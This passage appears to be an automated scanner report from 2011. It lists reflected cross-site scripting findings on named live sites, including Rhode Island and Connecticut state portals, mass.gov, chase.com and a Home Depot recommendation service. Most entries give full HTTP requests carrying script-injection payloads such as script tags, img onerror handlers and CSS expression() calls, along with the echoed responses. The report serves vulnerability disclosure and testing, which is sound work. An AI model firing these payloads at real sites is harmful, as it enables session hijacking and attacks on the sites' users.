ActiveFlagCrit=Y&SearchType=E&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=3d359"><script>alert(1)</script>3a9aab12ca4&lstDisplay=25&DetailId=&Refile=&FormCode=0000160&FilingMethod=I&FilingFee=&ReadFromDB=False&Refreshed=True&OldFEIN=&OldEntityName=&OldFiscalMonth=&OldFiscalDay=&NewFormation=&FilingNum=&BatchNum=&Doc
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:49:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8555
Content-Type: text/html
Cache-control: private

<HTML>

<HEAD>
<Title>State of Rhode Island and Providence Plantations - Public Browse and Search</title>

<style type="text/css">
.label {
font-family: "Courier New", Courier, monospac
...[SNIP]...
<input type=hidden name=Purpose value="3d359"><script>alert(1)</script>3a9aab12ca4">
...[SNIP]...

3.18. http://ucc.state.ri.us/CorpSearch/CorpSearchEntityList.asp [SearchType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/CorpSearch/CorpSearchEntityList.asp

Issue detail

The value of the SearchType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a8de"><script>alert(1)</script>fed265178c7 was submitted in the SearchType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /CorpSearch/CorpSearchEntityList.asp?ReadFromDB=True&UpdateAllowed= HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
Referer: http://ucc.state.ri.us/CorpSearch/CorpSearchInput.asp
Content-Length: 448
Cache-Control: max-age=0
Origin: http://ucc.state.ri.us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

ActiveFlagCrit=Y&SearchType=E2a8de"><script>alert(1)</script>fed265178c7&EntityName=xss&EntitySearchMethod=B&FEIN=&FilingNumber=&IndividualSearchMethod=B&FirstName=&MiddleName=&LastName=&AgentSearchMethod=B&AgentName=&Address=&Purpose=&lstDisplay=25&DetailId=&Refile=&Form
...[SNIP]...

Response

HTTP/1.1 500 Internal Server Error
Date: Wed, 13 Jul 2011 00:49:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4846
Content-Type: text/html
Cache-control: private

<Script Language=JavaScript>
alert('System Error: 900105\n\nOur system appears to be experiencing some difficulty at the moment.\n\nPlease try again later or contact technical support for more inform
...[SNIP]...
<input type=hidden name=SearchType value="E2a8de"><script>alert(1)</script>fed265178c7">
...[SNIP]...

3.19. http://ucc.state.ri.us/loginsystem/login.asp [FilingMethod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/loginsystem/login.asp

Issue detail

The value of the FilingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d411"%3balert(1)//2d4c3ef54be was submitted in the FilingMethod parameter. This input was echoed as 6d411";alert(1)//2d4c3ef54be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /loginsystem/login.asp?FilingMethod=6d411"%3balert(1)//2d4c3ef54be HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:48:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3894
Content-Type: text/html
Expires: Tue, 12 Jul 2011 00:48:22 GMT
Cache-control: no-cache

<SCRIPT LANGUAGE="JavaScript">
// 
...[SNIP]...

3.20. http://ucc.state.ri.us/ucc/uccmenu.asp [FilingMethod parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ucc.state.ri.us
Path:	/ucc/uccmenu.asp

Issue detail

The value of the FilingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f was submitted in the FilingMethod parameter. This input was echoed as 3ad54"style="x:expression(alert(1))"616bc28074f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /ucc/uccmenu.asp?FilingMethod=I3ad54"style%3d"x%3aexpression(alert(1))"616bc28074f HTTP/1.1
Host: ucc.state.ri.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQSDTSCTB=AKNKPFLBFPLJPOODINBOEFIF

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:47:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 7353
Content-Type: text/html
Expires: Wed, 13 Jul 2011 00:46:02 GMT
Cache-control: no-cache

<html>
<head>
<script LANGUAGE="JavaScript">
<!--
function ucc3() {
if (document.UCCMenu.UCC3MENU.value=='0') {
alert('You have to select a correct UCC3 type in the list box!');
return false;
...[SNIP]...
<input type="hidden" name="FilingMethod" value="I3ad54"style="x:expression(alert(1))"616bc28074f">
...[SNIP]...

3.21. https://www.chase.com/ccp/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.chase.com
Path:	/ccp/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29263"%20a%3db%209ef85dbd58f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29263" a=b 9ef85dbd58f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263"%20a%3db%209ef85dbd58f=1 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:49 GMT
Content-length: 12080
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263" a=b 9ef85dbd58f=1" onsubmit="return validateZip()">
...[SNIP]...

3.22. https://www.chase.com/ccp/index.jsp [targeturl parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.chase.com
Path:	/ccp/index.jsp

Issue detail

The value of the targeturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13971"%20a%3db%2077310f0ae36 was submitted in the targeturl parameter. This input was echoed as 13971" a=b 77310f0ae36 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview13971"%20a%3db%2077310f0ae36 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:44 GMT
Content-length: 10005
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/content.css'/>
<script language='Javas
...[SNIP]...
<form name="zipForm" method="post" action="/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview13971" a=b 77310f0ae36" onsubmit="return validateZip()">
...[SNIP]...

3.23. https://www.chase.com/index.jsp [targeturl parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.chase.com
Path:	/index.jsp

Issue detail

The value of the targeturl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e26b3"%3b99845ba5733 was submitted in the targeturl parameter. This input was echoed as e26b3";99845ba5733 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

POST /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/shared/assets/page/zipcode&targeturl=https%3A%2F%2Fwww.chase.com%3A443%2Findex.jsp%3Fpg_name%3Dccpmapp%2Fsmallbusiness%2Fbusiness_banking%2Fpage%2Fbb_checking_overview
Content-Length: 200
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overviewe26b3"%3b99845ba5733&zipcode=10011&submit.x=19&submit.y=13

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:28:01 GMT
Content-length: 3744
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Set-Cookie: DCTMSESSION=QfWyTc2RvFLRQppGpZ6LcpGKfcRny7D80FmKFh1lRBHJGpTCpSvS!792762552; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">

//-----------------------------------
...[SNIP]...
11*/
/*Modified for Prod issue 15591751: ref: WO 108711*/
document.location = "https://www.chase.com:443/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overviewe26b3";99845ba5733";
/*End Modified for Prod issue: ref: WO 108711*/

}

//----------------------------------------------------------------------
function processCookieOnSuccess()
{
DeleteCookiesOnSu
...[SNIP]...

3.24. https://www.chase.com/index.jsp [zipcode parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.chase.com
Path:	/index.jsp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9ea6%3balert(1)//816b0d67af5c2d49c was submitted in the zipcode parameter. This input was echoed as d9ea6;alert(1)//816b0d67af5c2d49c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263=&targeturl=https%253A%252F%252Fwww.chase.com%253A443%252Findex.jsp%253Fpg_name%253Dccpmapp%252Fsmallbusiness%252Fbusiness_banking%252Fpage%252Fbb_checking_overview%252629263%2522%2Ba%253Db%2B9ef85dbd58f%253D1&zipcode=10011d9ea6%3balert(1)//816b0d67af5c2d49c&submit.x=33&submit.y=5 HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/smallbusiness/business_banking/page/bb_checking_overview&29263%22%20a%3db%209ef85dbd58f=1
Cache-Control: max-age=0
Origin: https://www.chase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:18:26 GMT
Content-length: 3784
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
<html lang="en">
<HEAD>
<TITLE>
</TITLE>
<script language="JavaScript">

//-----------------------------------
...[SNIP]...
s = 60*1000;
///Negative expiration time set for the timeout cookie to make it session cookie
var marketlistExpiration = null ;

SetCookieOnSuccess("chasezip","zipcode=10011d9ea6;alert(1)//816b0d67af5c2d49c&state=NY&county=New York", zipExpiration, "/",".chase.com");

//new cookie code

SetCookieOnSuccess("marketlist","68|90|152|170|198", marketlistExpiration, "/",".chase.com");
...[SNIP]...

3.25. http://www.ct.gov/demhs/site/default.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ct.gov
Path:	/demhs/site/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af27"><script>alert(1)</script>5bc6d1e79b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31253
Content-Type: text/html
Set-Cookie: demhs=SA=False&EA=&SSL=False&F=CE83CBC6&NB=False&II=&ILO=False&FN=Guest&TU=CF83CBC7&CA=CF83CBC7&TC=06105&AN=&AG=&Q=CF83CBC7&PGT=&UA=Guest&LoginJumpBackTo=%2Fdemhs%2Fsite%2Fdefault%2Easp&AA=False; domain=www.ct.gov; path=/demhs
Set-Cookie: demhsNav=; path=/demhs
Set-Cookie: demhsNav%5FGID=; path=/demhs
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<a href="/demhs/site/default.asp?9af27"><script>alert(1)</script>5bc6d1e79b1=1&demhsNav=|42956|">
...[SNIP]...

3.26. http://www.mass.gov/ [L2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mass.gov
Path:	/

Issue detail

The value of the L2 request parameter is copied into the HTML document as text between TITLE tags. The payload 1b834</title><script>alert(1)</script>38aa81172fd was submitted in the L2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=eopsagencylanding&L=3&sid=Eeops&L0=Home&L1=Public+Safety+Agencies&L2=Massachusetts+Emergency+Management+Agency1b834</title><script>alert(1)</script>38aa81172fd HTTP/1.1
Host: www.mass.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:39:32 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:44:32 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9064

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Massachusetts Emergency Management Agency1b834</title><script>alert(1)</script>38aa81172fd - Executive Office of Public Safety</title>
...[SNIP]...

3.27. http://www.mass.gov/ [L3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mass.gov
Path:	/

Issue detail

The value of the L3 request parameter is copied into the HTML document as text between TITLE tags. The payload fba97</title><script>alert(1)</script>d6ae32a62b8 was submitted in the L3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pageID=ocasubtopic&L=4&L0=Home&L1=Consumer&L2=Housing+Information&L3=Foreclosure+Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8&sid=Eoca HTTP/1.1
Host: www.mass.gov
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mass.gov/?pageID=mg2homepage&L=1&L0=Home&sid=massgov2
Cookie: fsr.s={"v":1,"rid":"1310517722924_648675","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","cp":{"massgov2":"Visited","Deas":"No","Eveterans":"No","Eelders":"No","Eeohhs2":"No","Eoca":"No","Dmdaa":"No","Sessex":"No","Cago":"No","Eeops":"Visited","Aosc":"No","Ador":"No","Agov3":"No","Ihqcc":"No","Elwd":"No","Ehed":"No","Smsa":"No","Idppc":"No","Ctre":"No","Eeoe":"No","Eoeea":"No","Dber":"No","Eoaf":"No","Ieth":"No","Fstim":"No"},"pv":2,"to":5,"c":"http://www.mass.gov/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1310517726738}; __utma=255208596.1158802016.1310517723.1310517723.1310517723.1; __utmb=255208596.2.10.1310517723; __utmc=255208596; __utmz=255208596.1310517723.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:44:56 GMT
Server: Apache/2.0.46 (Red Hat)
Cache-Control: no-cache, max-age=300
Expires: Wed, 13 Jul 2011 00:49:56 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<title>Foreclosure Resourcesfba97</title><script>alert(1)</script>d6ae32a62b8 - Office of Consumer Affairs and Business Regulation</title>
...[SNIP]...

3.28. http://www.res-x.com/ws/r2/Resonance.aspx [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b was submitted in the cb parameter. This input was echoed as 89fa3<img src=a onerror=alert(1)>512095e9e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rr&cu=287408220&ct=&no=3&cb=r1eh89fa3<img%20src%3da%20onerror%3dalert(1)>512095e9e2b&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:45:10 GMT
Content-Length: 3298

r1eh89fa3<img src=a onerror=alert(1)>512095e9e2b({"Resonance":{"Response":[{"scheme":"search_rr","display":"yes","output":"<div id=\"accessories\"><div id=\"add-ons\" class=\"col\"><div id=\"ymal_vert
...[SNIP]...

3.29. http://www.res-x.com/ws/r2/Resonance.aspx [sc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.res-x.com
Path:	/ws/r2/Resonance.aspx

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload afeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e was submitted in the sc parameter. This input was echoed as afeb2<img src=a onerror=alert(1)>543645a44e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ws/r2/Resonance.aspx?appid=HOMEDEPOT01&tk=345519762253388&ss=877035136567428&sg=1&pg=800586763303726&bx=true&vr=2.69&sc=search_rrafeb2<img%20src%3da%20onerror%3dalert(1)>543645a44e&cu=287408220&ct=&no=3&cb=r1eh&clk=&ur=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Search%3Fkeyword%3Dxss%26selectedCatgry%3DSEARCH+ALL%26langId%3D-1%26storeId%3D10051%26catalogId%3D10053&plk=202349120;202571062;202349118;202571024;202571026;202571029;202571027;202571025;202571023;202571028;202349088;202349089;202349087;100661424;&rf=http%3A//www.homedepot.com/ HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/Search?keyword=xss&selectedCatgry=SEARCH+ALL&langId=-1&storeId=10051&catalogId=10053
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=r3vcat55x0xldvufmhh0m545; NSC_wjq-ipnfefqpu=ffffffffc3a01e5745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Tue, 12 Jul 2011 16:44:59 GMT
Content-Length: 138

r1eh({"Resonance":{"Response":[{"scheme":"search_rrafeb2<img src=a onerror=alert(1)>543645a44e","display":"no","output":"<div></div>"}]}})

3.30. http://apps.ccbill.com/ [cookieLetterSize cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/

Issue detail

